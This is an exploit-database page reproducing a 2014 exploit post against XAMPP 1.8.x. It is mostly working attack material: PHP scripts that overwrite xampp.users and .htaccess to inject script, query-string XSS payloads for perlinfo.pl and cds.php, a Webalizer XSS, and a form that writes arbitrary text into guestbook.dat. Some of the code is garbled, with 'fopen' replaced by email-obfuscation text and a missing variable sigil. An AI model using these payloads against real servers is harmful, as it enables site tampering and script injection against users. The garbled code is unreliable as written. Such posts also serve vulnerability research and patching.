Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
zdtDevilScreaM1337DAY-ID-22729
HistoryOct 06, 2014 - 12:00 a.m.

XAMPP 1.8.x Multiple Vulnerabilities

2014-10-0600:00:00
DevilScreaM
0day.today
826
JSON

Exploit for multiple platform in category remote exploits

#Exploit Name : XAMPP 1.8.x Multiple Vulnerabilities
#Author : DevilScreaM
#Date : 6 October 2014
#Vendor : http://bitnami.com
#Version : 1.8.x or Higher Version
#Operating System : Windows / Linux
#Vulnerability : Cross Site Scripting / Write File
#Type : #WebApps #Application
#Tested : Windows 7 64 Bit
#Thanks : Newbie-Security, Indonesian Hacker Team, Indonesia Coder Team, Indonesia Security Team


Cross Site Scripting at perlinfo.pl #1

Perl Version : 5.16.3

Script For Exploit

For Localhost

<?php
$xss  = "<script>alert('Tested by DevilScreaM')</script>:";
$f [email protected] ('C:\xampp\security\xampp.users','w');
fwrite($f , $xss);

$htcs  = 'AuthName "Username = your Script XSS"
AuthType Basic
AuthUserFile "C:\xampp\security\xampp.users"
require valid-user';
$f1 [email protected] ('C:\xampp\htdocs\xampp\.htaccess','w');
fwrite($f1 , $htcs);
?>

<script>
window.location = "http://127.0.0.1/xampp/perlinfo.pl"
</script>


==================================================================

For Site

<?php
$xss  = "<script>alert('Tested by DevilScreaM')</script>:";
$f [email protected] ('my.users','w');
fwrite($f , $xss);

$htcs  = 'AuthName "Username = your Script XSS"
AuthType Basic
AuthUserFile "my.users"
require valid-user';
$f1 [email protected] ('.htaccess','w');
fwrite($f1 , $htcs);

$pl = '#!"perl\bin\perl.exe"

use HTML::Perlinfo;
use CGI qw(header);

$q = new CGI;
print $q->header;

$p = new HTML::Perlinfo;
$p->info_general;
$p->info_variables;
$p->info_modules;
$p->info_license;';
$f2 [email protected] ('perlinfo.pl','w');
fwrite(f2 , $pl);
?>

<script>
window.location = "http://site.com/perlinfo.pl"
</script>

==================================================================

Save Script C:\xampp\htdocs\xss.php


Open Browser and Running http://127.0.0.1/xss.php
You Will Redirect to http://127.0.0.1/xampp/perlinfo.pl

Auth Login
Username : <script>alert('Tested by DevilScreaM')</script>
Password : 


===================================================================

Cross Site Scripting at perlinfo.pl Query String #2

Exploit :

http://127.0.0.1/xampp/perlinfo.pl?[XSS]
http://127.0.0.1/xampp/perlinfo.pl?[XSS]=[XSS]

Example

http://127.0.0.1/xampp/perlinfo.pl?<script>alert('DevilScreaM')</script>=<script>alert('Newbie-Security')</script>


====================================================================

Cross Site Scripting at http://127.0.0.1/xampp/perlinfo.pl #3


Exploit :

1. Go To Directory C:\xampp\apache\conf\
2. Edit File httpd.conf
3. Go To Line 209

Edit ServerAdmin [email protected] to

ServerAdmin [YOUR XSS]

Example :

ServerAdmin <h1>DevilScreaM</h1>


4. Save File

5. See your XSS at

http://127.0.0.1/xampp/perlinfo.pl


====================================================================



Cross Site Scripting at http://127.0.0.1/Webalizer/


Script for Exploit :


<?php
$xss  = "<script>alert('Tested by DevilScreaM')</script>:";
$f [email protected] ('C:\xampp\security\xampp.users','w');
fwrite($f , $xss);

?>

<script>
window.location = "http://127.0.0.1/webalizer/usage_[YEARS][MONTH].html"
</script>

Information :
usage_[YEARS][MONTH].html => usage_201410.html

====================================================================

Save Script Webalizer.php


Command

@echo off
C:\xampp\webalizer\webalizer.exe -c C:\xampp\webalizer\webalizer.conf

PHP

<?php
 
$webalizer = "C:\xampp\webalizer\webalizer.bat";
	
system($webalizer);

?>

=====================================================================

Save Script webalizer.cmd or webalizer_run.php


Run Webalizer.cmd and Waiting Process

Result

http://127.0.0.1/webalizer/usage_[years][month].html

Example

http://127.0.0.1/webalizer/usage_201410.html


==================================================================


Cross Site Scripting at cds.php

Exploit :

http://127.0.0.1/xampp/cds.php?interpret=[XSS]

Example :

http://127.0.0.1/xampp/cds.php?interpret=<script>alert('Tested by> DevilScreaM')</script>


====================================================================



Write File Vulnerability

Script to Exploit :


<form action='http://127.0.0.1/xampp/guestbook-en.pl' method='get'>
<table border='0' cellpadding='0' cellspacing='0'>
<tr><td>TEXT:</td>
<td><input type='text' size='30' value='Tested by DevilScreaM' name='f_name'></td></tr>
<tr><td></td><td><input type='submit' value='WRITE'></td></tr>
</table></form>
</br></br>
<a href="http://127.0.0.1/xampp/guestbook.dat"><b>Result</b></a>

==================================================================

Save Script with extension .html

Open Script and Click Write or Change Text

Result

http://127.0.0.1/xampp/guestbook.dat

#  0day.today [2018-04-02]  #
JSON